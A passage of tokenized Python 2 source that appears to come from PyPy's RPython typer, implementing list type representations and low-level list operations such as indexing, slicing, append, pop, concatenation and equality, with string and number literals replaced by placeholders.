( ( r_lst , r_int ) , hop ) : <EOL> return pair ( r_lst , r_int ) . rtype_getitem ( hop , checkidx = True ) <EOL> rtype_getitem_idx_key = rtype_getitem_idx <EOL> def rtype_setitem ( ( r_lst , r_int ) , hop ) : <EOL> if hop . has_implicit_exception ( IndexError ) : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> v_lst , v_index , v_item = hop . inputargs ( r_lst , Signed , r_lst . item_repr ) <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_setitem_nonneg <EOL> else : <EOL> llfn = ll_setitem <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( llfn , v_func , v_lst , v_index , v_item ) <EOL> def rtype_mul ( ( r_lst , r_int ) , hop ) : <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> v_lst , v_factor = hop . inputargs ( r_lst , Signed ) <EOL> return hop . gendirectcall ( ll_mul , cRESLIST , v_lst , v_factor ) <EOL> class __extend__ ( pairtype ( AbstractListRepr , IntegerRepr ) ) : <EOL> def rtype_delitem ( ( r_lst , r_int ) , hop ) : <EOL> if hop . has_implicit_exception ( IndexError ) : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> v_lst , v_index = hop . inputargs ( r_lst , Signed ) <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_delitem_nonneg <EOL> else : <EOL> llfn = ll_delitem <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( llfn , v_func , v_lst , v_index ) <EOL> def rtype_inplace_mul ( ( r_lst , r_int ) , hop ) : <EOL> v_lst , v_factor = hop . inputargs ( r_lst , Signed ) <EOL> return hop . gendirectcall ( ll_inplace_mul , v_lst , v_factor ) <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , AbstractBaseListRepr ) ) : <EOL> def convert_from_to ( ( r_lst1 , r_lst2 ) , v , llops ) : <EOL> if r_lst1 . listitem is None or r_lst2 . listitem is None : <EOL> return NotImplemented <EOL> if r_lst1 . listitem is not r_lst2 . listitem : <EOL> return NotImplemented <EOL> return v <EOL> def rtype_eq ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> assert r_lst1 . item_repr == r_lst2 . item_repr <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> return hop . gendirectcall ( ll_listeq , v_lst1 , v_lst2 , r_lst1 . get_eqfunc ( ) ) <EOL> def rtype_ne ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> assert r_lst1 . item_repr == r_lst2 . item_repr <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> flag = hop . gendirectcall ( ll_listeq , v_lst1 , v_lst2 , r_lst1 . get_eqfunc ( ) ) <EOL> return hop . genop ( '<STR_LIT>' , [ flag ] , resulttype = Bool ) <EOL> def rtype_newlist ( hop ) : <EOL> nb_args = hop . nb_args <EOL> r_list = hop . r_result <EOL> if r_list == robject . pyobj_repr : <EOL> clist = hop . inputconst ( robject . pyobj_repr , list ) <EOL> v_result = hop . genop ( '<STR_LIT>' , [ clist ] , resulttype = robject . pyobj_repr ) <EOL> cname = hop . inputconst ( robject . pyobj_repr , '<STR_LIT>' ) <EOL> v_meth = hop . genop ( '<STR_LIT>' , [ v_result , cname ] , resulttype = robject . pyobj_repr ) <EOL> for i in range ( nb_args ) : <EOL> v_item = hop . inputarg ( robject . pyobj_repr , arg = i ) <EOL> hop . genop ( '<STR_LIT>' , [ v_meth , v_item ] , resulttype = robject . pyobj_repr ) <EOL> return v_result <EOL> r_listitem = r_list . item_repr <EOL> items_v = [ hop . inputarg ( r_listitem , arg = i ) for i in range ( nb_args ) ] <EOL> return hop . rtyper . type_system . rlist . newlist ( hop . llops , r_list , items_v ) <EOL> def rtype_alloc_and_set ( hop ) : <EOL> r_list = hop . r_result <EOL> if r_list == robject . pyobj_repr : <EOL> raise Exception , '<STR_LIT>' <EOL> v_count , v_item = hop . inputargs ( Signed , r_list . item_repr ) <EOL> cLIST = hop . inputconst ( Void , r_list . LIST ) <EOL> return hop . gendirectcall ( ll_alloc_and_set , cLIST , v_count , v_item ) <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , AbstractBaseListRepr ) ) : <EOL> def rtype_add ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> return hop . gendirectcall ( ll_concat , cRESLIST , v_lst1 , v_lst2 ) <EOL> class __extend__ ( pairtype ( AbstractListRepr , AbstractBaseListRepr ) ) : <EOL> def rtype_inplace_add ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> hop . gendirectcall ( ll_extend , v_lst1 , v_lst2 ) <EOL> return v_lst1 <EOL> class __extend__ ( pairtype ( AbstractListRepr , AbstractStringRepr ) ) : <EOL> def rtype_inplace_add ( ( r_lst1 , r_str2 ) , hop ) : <EOL> if r_lst1 . item_repr . lowleveltype not in ( Char , UniChar ) : <EOL> raise TyperError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> string_repr = r_str2 . repr <EOL> v_lst1 , v_str2 = hop . inputargs ( r_lst1 , string_repr ) <EOL> c_strlen = hop . inputconst ( Void , string_repr . ll . ll_strlen ) <EOL> c_stritem = hop . inputconst ( Void , string_repr . ll . ll_stritem_nonneg ) <EOL> hop . gendirectcall ( ll_extend_with_str , v_lst1 , v_str2 , <EOL> c_strlen , c_stritem ) <EOL> return v_lst1 <EOL> def rtype_extend_with_str_slice ( ( r_lst1 , r_str2 ) , hop ) : <EOL> if r_lst1 . item_repr . lowleveltype not in ( Char , UniChar ) : <EOL> raise TyperError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> string_repr = r_lst1 . rtyper . type_system . rstr . string_repr <EOL> v_lst1 = hop . inputarg ( r_lst1 , arg = <NUM_LIT:0> ) <EOL> v_str2 = hop . inputarg ( string_repr , arg = <NUM_LIT:3> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> c_strlen = hop . inputconst ( Void , string_repr . ll . ll_strlen ) <EOL> c_stritem = hop . inputconst ( Void , string_repr . ll . ll_stritem_nonneg ) <EOL> ll_fn = globals ( ) [ '<STR_LIT>' % kind ] <EOL> hop . gendirectcall ( ll_fn , v_lst1 , v_str2 , c_strlen , c_stritem , * vlist ) <EOL> return v_lst1 <EOL> class __extend__ ( pairtype ( AbstractListRepr , AbstractCharRepr ) ) : <EOL> def rtype_extend_with_char_count ( ( r_lst1 , r_chr2 ) , hop ) : <EOL> if r_lst1 . item_repr . lowleveltype not in ( Char , UniChar ) : <EOL> raise TyperError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> char_repr = r_lst1 . rtyper . type_system . rstr . char_repr <EOL> v_lst1 , v_chr , v_count = hop . inputargs ( r_lst1 , char_repr , Signed ) <EOL> hop . gendirectcall ( ll_extend_with_char_count , v_lst1 , v_chr , v_count ) <EOL> return v_lst1 <EOL> class __extend__ ( AbstractBaseListRepr ) : <EOL> def rtype_getslice ( r_lst , hop ) : <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> v_lst = hop . inputarg ( r_lst , arg = <NUM_LIT:0> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> ll_listslice = globals ( ) [ '<STR_LIT>' % kind ] <EOL> return hop . gendirectcall ( ll_listslice , cRESLIST , v_lst , * vlist ) <EOL> def rtype_setslice ( r_lst , hop ) : <EOL> v_lst = hop . inputarg ( r_lst , arg = <NUM_LIT:0> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> if kind != '<STR_LIT>' : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> kind , ) ) <EOL> v_start , v_stop = vlist <EOL> v_lst2 = hop . inputarg ( hop . args_r [ <NUM_LIT:3> ] , arg = <NUM_LIT:3> ) <EOL> hop . gendirectcall ( ll_listsetslice , v_lst , v_start , v_stop , v_lst2 ) <EOL> def rtype_delslice ( r_lst , hop ) : <EOL> v_lst = hop . inputarg ( r_lst , arg = <NUM_LIT:0> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> ll_listdelslice = globals ( ) [ '<STR_LIT>' % kind ] <EOL> return hop . gendirectcall ( ll_listdelslice , v_lst , * vlist ) <EOL> class AbstractListIteratorRepr ( IteratorRepr ) : <EOL> def newiter ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self . r_list ) <EOL> citerptr = hop . inputconst ( Void , self . lowleveltype ) <EOL> return hop . gendirectcall ( self . ll_listiter , citerptr , v_lst ) <EOL> def rtype_next ( self , hop ) : <EOL> v_iter , = hop . inputargs ( self ) <EOL> hop . has_implicit_exception ( StopIteration ) <EOL> hop . exception_is_here ( ) <EOL> v_res = hop . gendirectcall ( self . ll_listnext , v_iter ) <EOL> return self . r_list . recast ( hop . llops , v_res ) <EOL> def ll_alloc_and_set ( LIST , count , item ) : <EOL> if count < <NUM_LIT:0> : <EOL> count = <NUM_LIT:0> <EOL> l = LIST . ll_newlist ( count ) <EOL> T = typeOf ( item ) <EOL> if T is Char or T is UniChar : <EOL> check = ord ( item ) <EOL> elif isinstance ( T , Number ) : <EOL> check = widen ( item ) <EOL> else : <EOL> check = item <EOL> if ( not malloc_zero_filled ) or check : <EOL> i = <NUM_LIT:0> <EOL> while i < count : <EOL> l . ll_setitem_fast ( i , item ) <EOL> i += <NUM_LIT:1> <EOL> return l <EOL> ll_alloc_and_set . oopspec = '<STR_LIT>' <EOL> def ll_null_item ( lst ) : <EOL> LIST = typeOf ( lst ) <EOL> if isinstance ( LIST , Ptr ) : <EOL> ITEM = LIST . TO . ITEM <EOL> if isinstance ( ITEM , Ptr ) : <EOL> return nullptr ( ITEM . TO ) <EOL> return None <EOL> def listItemType ( lst ) : <EOL> LIST = typeOf ( lst ) <EOL> if isinstance ( LIST , Ptr ) : <EOL> LIST = LIST . TO <EOL> return LIST . ITEM <EOL> def ll_copy ( RESLIST , l ) : <EOL> length = l . ll_length ( ) <EOL> new_lst = RESLIST . ll_newlist ( length ) <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> new_lst . ll_setitem_fast ( i , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> return new_lst <EOL> def ll_len ( l ) : <EOL> return l . ll_length ( ) <EOL> def ll_list_is_true ( l ) : <EOL> return bool ( l ) and l . ll_length ( ) != <NUM_LIT:0> <EOL> def ll_len_foldable ( l ) : <EOL> return l . ll_length ( ) <EOL> ll_len_foldable . oopspec = '<STR_LIT>' <EOL> def ll_list_is_true_foldable ( l ) : <EOL> return bool ( l ) and ll_len_foldable ( l ) != <NUM_LIT:0> <EOL> def ll_append ( l , newitem ) : <EOL> length = l . ll_length ( ) <EOL> l . _ll_resize_ge ( length + <NUM_LIT:1> ) <EOL> l . ll_setitem_fast ( length , newitem ) <EOL> ll_append . oopspec = '<STR_LIT>' <EOL> def ll_prepend ( l , newitem ) : <EOL> length = l . ll_length ( ) <EOL> l . _ll_resize_ge ( length + <NUM_LIT:1> ) <EOL> dst = length <EOL> while dst > <NUM_LIT:0> : <EOL> src = dst - <NUM_LIT:1> <EOL> l . ll_setitem_fast ( dst , l . ll_getitem_fast ( src ) ) <EOL> dst = src <EOL> l . ll_setitem_fast ( <NUM_LIT:0> , newitem ) <EOL> ll_prepend . oopspec = '<STR_LIT>' <EOL> def ll_concat ( RESLIST , l1 , l2 ) : <EOL> len1 = l1 . ll_length ( ) <EOL> len2 = l2 . ll_length ( ) <EOL> try : <EOL> newlength = ovfcheck ( len1 + len2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> while j < len1 : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( j ) ) <EOL> j += <NUM_LIT:1> <EOL> i = <NUM_LIT:0> <EOL> while i < len2 : <EOL> l . ll_setitem_fast ( j , l2 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> def ll_insert_nonneg ( l , index , newitem ) : <EOL> length = l . ll_length ( ) <EOL> ll_assert ( <NUM_LIT:0> <= index , "<STR_LIT>" ) <EOL> ll_assert ( index <= length , "<STR_LIT>" ) <EOL> l . _ll_resize_ge ( length + <NUM_LIT:1> ) <EOL> dst = length <EOL> while dst > index : <EOL> src = dst - <NUM_LIT:1> <EOL> l . ll_setitem_fast ( dst , l . ll_getitem_fast ( src ) ) <EOL> dst = src <EOL> l . ll_setitem_fast ( index , newitem ) <EOL> ll_insert_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_pop_nonneg ( func , l , index ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> if func is dum_checkidx : <EOL> if index >= l . ll_length ( ) : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < l . ll_length ( ) , "<STR_LIT>" ) <EOL> res = l . ll_getitem_fast ( index ) <EOL> ll_delitem_nonneg ( dum_nocheck , l , index ) <EOL> return res <EOL> ll_pop_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_pop_default ( func , l ) : <EOL> length = l . ll_length ( ) <EOL> if func is dum_checkidx and ( length == <NUM_LIT:0> ) : <EOL> raise IndexError <EOL> ll_assert ( length > <NUM_LIT:0> , "<STR_LIT>" ) <EOL> index = length - <NUM_LIT:1> <EOL> newlength = index <EOL> res = l . ll_getitem_fast ( index ) <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> l . ll_setitem_fast ( index , null ) <EOL> l . _ll_resize_le ( newlength ) <EOL> return res <EOL> ll_pop_default . oopspec = '<STR_LIT>' <EOL> def ll_pop_zero ( func , l ) : <EOL> length = l . ll_length ( ) <EOL> if func is dum_checkidx and ( length == <NUM_LIT:0> ) : <EOL> raise IndexError <EOL> ll_assert ( length > <NUM_LIT:0> , "<STR_LIT>" ) <EOL> newlength = length - <NUM_LIT:1> <EOL> res = l . ll_getitem_fast ( <NUM_LIT:0> ) <EOL> j = <NUM_LIT:0> <EOL> j1 = j + <NUM_LIT:1> <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l . ll_getitem_fast ( j1 ) ) <EOL> j = j1 <EOL> j1 += <NUM_LIT:1> <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> l . ll_setitem_fast ( newlength , null ) <EOL> l . _ll_resize_le ( newlength ) <EOL> return res <EOL> ll_pop_zero . oopspec = '<STR_LIT>' <EOL> def ll_pop ( func , l , index ) : <EOL> length = l . ll_length ( ) <EOL> if index < <NUM_LIT:0> : <EOL> index += length <EOL> if func is dum_checkidx : <EOL> if index < <NUM_LIT:0> or index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> res = l . ll_getitem_fast ( index ) <EOL> ll_delitem_nonneg ( dum_nocheck , l , index ) <EOL> return res <EOL> ll_pop . oopspec = '<STR_LIT>' <EOL> def ll_reverse ( l ) : <EOL> length = l . ll_length ( ) <EOL> i = <NUM_LIT:0> <EOL> length_1_i = length - <NUM_LIT:1> - i <EOL> while i < length_1_i : <EOL> tmp = l . ll_getitem_fast ( i ) <EOL> l . ll_setitem_fast ( i , l . ll_getitem_fast ( length_1_i ) ) <EOL> l . ll_setitem_fast ( length_1_i , tmp ) <EOL> i += <NUM_LIT:1> <EOL> length_1_i -= <NUM_LIT:1> <EOL> def ll_getitem_nonneg ( func , l , index ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> if func is dum_checkidx : <EOL> if index >= l . ll_length ( ) : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < l . ll_length ( ) , "<STR_LIT>" ) <EOL> return l . ll_getitem_fast ( index ) <EOL> ll_getitem_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_getitem ( func , l , index ) : <EOL> length = l . ll_length ( ) <EOL> if index < <NUM_LIT:0> : <EOL> index += length <EOL> if func is dum_checkidx : <EOL> if index < <NUM_LIT:0> or index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> return l . ll_getitem_fast ( index ) <EOL> ll_getitem . oopspec = '<STR_LIT>' <EOL> def ll_getitem_foldable_nonneg ( func , l , index ) : <EOL> return ll_getitem_nonneg ( func , l , index ) <EOL> ll_getitem_foldable_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_getitem_foldable ( func , l , index ) : <EOL> return ll_getitem ( func , l , index ) <EOL> ll_getitem_foldable . oopspec = '<STR_LIT>' <EOL> def ll_setitem_nonneg ( func , l , index , newitem ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> if func is dum_checkidx : <EOL> if index >= l . ll_length ( ) : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < l . ll_length ( ) , "<STR_LIT>" ) <EOL> l . ll_setitem_fast ( index , newitem ) <EOL> ll_setitem_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_setitem ( func , l , index , newitem ) : <EOL> length = l . ll_length ( ) <EOL> if index < <NUM_LIT:0> : <EOL> index += length <EOL> if func is dum_checkidx : <EOL> if index < <NUM_LIT:0> or index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> l . ll_setitem_fast ( index , newitem ) <EOL> ll_setitem . oopspec = '<STR_LIT>' <EOL> def ll_delitem_nonneg ( func , l , index ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> length = l . ll_length ( ) <EOL> if func is dum_checkidx : <EOL> if index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> newlength = length - <NUM_LIT:1> <EOL> j = index <EOL> j1 = j + <NUM_LIT:1> <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l . ll_getitem_fast ( j1 ) ) <EOL> j = j1 <EOL> j1 += <NUM_LIT:1> <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> l . ll_setitem_fast ( newlength , null ) <EOL> l . _ll_resize_le ( newlength ) <EOL> ll_delitem_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_delitem ( func , l , i ) : <EOL> length = l . ll_length ( ) <EOL> if i < <NUM_LIT:0> : <EOL> i += length <EOL> if func is dum_checkidx : <EOL> if i < <NUM_LIT:0> or i >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( i >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( i < length , "<STR_LIT>" ) <EOL> ll_delitem_nonneg ( dum_nocheck , l , i ) <EOL> ll_delitem . oopspec = '<STR_LIT>' <EOL> def ll_extend ( l1 , l2 ) : <EOL> len1 = l1 . ll_length ( ) <EOL> len2 = l2 . ll_length ( ) <EOL> try : <EOL> newlength = ovfcheck ( len1 + len2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> l1 . _ll_resize_ge ( newlength ) <EOL> i = <NUM_LIT:0> <EOL> j = len1 <EOL> while i < len2 : <EOL> l1 . ll_setitem_fast ( j , l2 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> ll_extend . oopspec = '<STR_LIT>' <EOL> def ll_extend_with_str ( lst , s , getstrlen , getstritem ) : <EOL> return ll_extend_with_str_slice_startonly ( lst , s , getstrlen , getstritem , <NUM_LIT:0> ) <EOL> def ll_extend_with_str_slice_startonly ( lst , s , getstrlen , getstritem , start ) : <EOL> len1 = lst . ll_length ( ) <EOL> len2 = getstrlen ( s ) <EOL> count2 = len2 - start <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> assert count2 >= <NUM_LIT:0> , "<STR_LIT>" <EOL> try : <EOL> newlength = ovfcheck ( len1 + count2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> i = start <EOL> j = len1 <EOL> while i < len2 : <EOL> c = getstritem ( s , i ) <EOL> if listItemType ( lst ) is UniChar : <EOL> c = unichr ( ord ( c ) ) <EOL> lst . ll_setitem_fast ( j , c ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> def ll_extend_with_str_slice_startstop ( lst , s , getstrlen , getstritem , <EOL> start , stop ) : <EOL> len1 = lst . ll_length ( ) <EOL> len2 = getstrlen ( s ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= len2 , "<STR_LIT>" ) <EOL> if stop > len2 : <EOL> stop = len2 <EOL> count2 = stop - start <EOL> assert count2 >= <NUM_LIT:0> , "<STR_LIT>" <EOL> try : <EOL> newlength = ovfcheck ( len1 + count2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> i = start <EOL> j = len1 <EOL> while i < stop : <EOL> c = getstritem ( s , i ) <EOL> if listItemType ( lst ) is UniChar : <EOL> c = unichr ( ord ( c ) ) <EOL> lst . ll_setitem_fast ( j , c ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> def ll_extend_with_str_slice_minusone ( lst , s , getstrlen , getstritem ) : <EOL> len1 = lst . ll_length ( ) <EOL> len2m1 = getstrlen ( s ) - <NUM_LIT:1> <EOL> assert len2m1 >= <NUM_LIT:0> , "<STR_LIT>" <EOL> try : <EOL> newlength = ovfcheck ( len1 + len2m1 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> i = <NUM_LIT:0> <EOL> j = len1 <EOL> while i < len2m1 : <EOL> c = getstritem ( s , i ) <EOL> if listItemType ( lst ) is UniChar : <EOL> c = unichr ( ord ( c ) ) <EOL> lst . ll_setitem_fast ( j , c ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> def ll_extend_with_char_count ( lst , char , count ) : <EOL> if count <= <NUM_LIT:0> : <EOL> return <EOL> len1 = lst . ll_length ( ) <EOL> try : <EOL> newlength = ovfcheck ( len1 + count ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> j = len1 <EOL> if listItemType ( lst ) is UniChar : <EOL> char = unichr ( ord ( char ) ) <EOL> while j < newlength : <EOL> lst . ll_setitem_fast ( j , char ) <EOL> j += <NUM_LIT:1> <EOL> def ll_listslice_startonly ( RESLIST , l1 , start ) : <EOL> len1 = l1 . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= len1 , "<STR_LIT>" ) <EOL> newlength = len1 - start <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> i = start <EOL> while i < len1 : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> ll_listslice_startonly . _annenforceargs_ = ( None , None , int ) <EOL> def ll_listslice_startstop ( RESLIST , l1 , start , stop ) : <EOL> length = l1 . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= length , "<STR_LIT>" ) <EOL> ll_assert ( stop >= start , "<STR_LIT>" ) <EOL> if stop > length : <EOL> stop = length <EOL> newlength = stop - start <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> i = start <EOL> while i < stop : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> def ll_listslice_minusone ( RESLIST , l1 ) : <EOL> newlength = l1 . ll_length ( ) - <NUM_LIT:1> <EOL> ll_assert ( newlength >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( j ) ) <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> def ll_listdelslice_startonly ( l , start ) : <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= l . ll_length ( ) , "<STR_LIT>" ) <EOL> newlength = start <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> j = l . ll_length ( ) - <NUM_LIT:1> <EOL> while j >= newlength : <EOL> l . ll_setitem_fast ( j , null ) <EOL> j -= <NUM_LIT:1> <EOL> l . _ll_resize_le ( newlength ) <EOL> ll_listdelslice_startonly . oopspec = '<STR_LIT>' <EOL> def ll_listdelslice_startstop ( l , start , stop ) : <EOL> length = l . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= length , "<STR_LIT>" ) <EOL> ll_assert ( stop >= start , "<STR_LIT>" ) <EOL> if stop > length : <EOL> stop = length <EOL> newlength = length - ( stop - start ) <EOL> j = start <EOL> i = stop <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> j = length - <NUM_LIT:1> <EOL> while j >= newlength : <EOL> l . ll_setitem_fast ( j , null ) <EOL> j -= <NUM_LIT:1> <EOL> l . _ll_resize_le ( newlength ) <EOL> ll_listdelslice_startstop . oopspec = '<STR_LIT>' <EOL> def ll_listsetslice ( l1 , start , stop , l2 ) : <EOL> count = l2 . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= l1 . ll_length ( ) , "<STR_LIT>" ) <EOL> ll_assert ( count == stop - start , <EOL> "<STR_LIT>" ) <EOL> j = start <EOL> i = <NUM_LIT:0> <EOL> while i < count : <EOL> l1 . ll_setitem_fast ( j , l2 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> ll_listsetslice . oopspec = '<STR_LIT>' <EOL> def ll_listeq ( l1 , l2 , eqfn ) : <EOL> if not l1 and not l2 : <EOL> return True <EOL> if not l1 or not l2 : <EOL> return False <EOL> len1 = l1 . ll_length ( ) <EOL> len2 = l2 . ll_length ( ) <EOL> if len1 != len2 : <EOL> return False <EOL> j = <NUM_LIT:0> <EOL> while j < len1 : <EOL> if eqfn is None : <EOL> if l1 . ll_getitem_fast ( j ) != l2 . ll_getitem_fast ( j ) : <EOL> return False <EOL> else : <EOL> if not eqfn ( l1 . ll_getitem_fast ( j ) , l2 . ll_getitem_fast ( j ) ) : <EOL> return False <EOL> j += <NUM_LIT:1> <EOL> return True <EOL> def ll_listcontains ( lst , obj , eqfn ) : <EOL> lng = lst . ll_length ( ) <EOL> j = <NUM_LIT:0> <EOL> while j < lng : <EOL> if eqfn is None : <EOL> if lst . ll_getitem_fast ( j ) == obj : <EOL> return True <EOL> else : <EOL> if eqfn ( lst . ll_getitem_fast ( j ) , obj ) : <EOL> return True <EOL> j += <NUM_LIT:1> <EOL> return False <EOL> def ll_listindex ( lst , obj , eqfn ) : <EOL> lng = lst . ll_length ( ) <EOL> j = <NUM_LIT:0> <EOL> while j < lng : <EOL> if eqfn is None : <EOL> if lst . ll_getitem_fast ( j ) == obj : <EOL> return j <EOL> else : <EOL> if eqfn ( lst . ll_getitem_fast ( j ) , obj ) : <EOL> return j <EOL> j += <NUM_LIT:1> <EOL> raise ValueError <EOL> def ll_listremove ( lst , obj , eqfn ) : <EOL> index = ll_listindex ( lst , obj , eqfn ) <EOL> ll_delitem_nonneg ( dum_nocheck , lst , index ) <EOL> def ll_inplace_mul ( l , factor ) : <EOL> length = l . ll_length ( ) <EOL> if factor < <NUM_LIT:0> : <EOL> factor = <NUM_LIT:0> <EOL> try : <EOL> resultlen = ovfcheck ( length * factor ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> res = l <EOL> res . _ll_resize ( resultlen ) <EOL> j = length <EOL> while j < resultlen : <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> p = j + i <EOL> res . ll_setitem_fast ( p , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += length <EOL> return res <EOL> ll_inplace_mul . oopspec = '<STR_LIT>' <EOL> def ll_mul ( RESLIST , l , factor ) : <EOL> length = l . ll_length ( ) <EOL> if factor < <NUM_LIT:0> : <EOL> factor = <NUM_LIT:0> <EOL> try : <EOL> resultlen = ovfcheck ( length * factor ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> res = RESLIST . ll_newlist ( resultlen ) <EOL> j = <NUM_LIT:0> <EOL> while j < resultlen : <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> p = j + i <EOL> res . ll_setitem_fast ( p , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += length <EOL> return res </s>
